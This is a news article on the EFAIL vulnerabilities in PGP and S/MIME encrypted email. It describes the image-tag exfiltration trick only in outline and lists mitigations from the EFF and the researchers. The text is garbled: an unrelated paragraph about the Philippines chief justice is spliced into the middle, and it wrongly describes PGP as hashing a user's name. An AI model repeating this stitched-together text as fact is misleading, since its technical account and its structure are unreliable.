German researchers have found a major vulnerability in PGP (Pretty Good Privacy), a popular email encryption program, which could reveal past and present encrypted emails. The vulnerabilities, dubbed EFAIL, were first mentioned by the EFF on Sunday. The Foundation which has been in communication with the researchers has advised users to "temporarily stop sending and especially reading PGP-encrypted email".
"They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past", researchers said.
Essentially, an attacker sends three parts - a partial HTML img tag declaration, a string of encrypted text, followed by the closing HTML for the image tag.
There are two different types of attacks included in EFAIL. The attacker would then have to get the sender or one of the receivers of the previously obtained message to open a new attacker-sent email.
Philippines chief justice, Duterte's critic, expelled by Supreme Court colleagues
The chief justice said that he was reconstituting the bench and then stood up, he said, after which the bench was reconstituted. With "a lapdog Congress and a seriously wounded Senate, we now have a puppet Supreme Court", noted the statement .
Werner Koch of GnuPG, a popular provider of GPG encryption, said the vulnerability was not in the encryption protocols, but rather, in the email clients used to decrypt them. "The attack has a large surface, since for each encrypted email sent to n recipients, there are n + 1 mail clients that are susceptible to our attack", the abstract of the research paper reads.
EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages.
The Efail report lists additional steps users can take to reduce the likelihood of falling prey to encryption attacks - namely, decrypting S/Mime and PGP outside email clients in a separate application and disabling HTML rendering altogether.
PGP, for example, works using an algorithm to generate a "hash", or mathematical summary, of a user's name and other information.
In the longer term they said patches for email client plugins and changes to OpenPGP and S/MIME could prevent any problems. The developer of NeoPG noted on Twitter that "The OpenPGP working group at the IETF, which was on the way to address some of the issues, was closed in November due to lack of progress".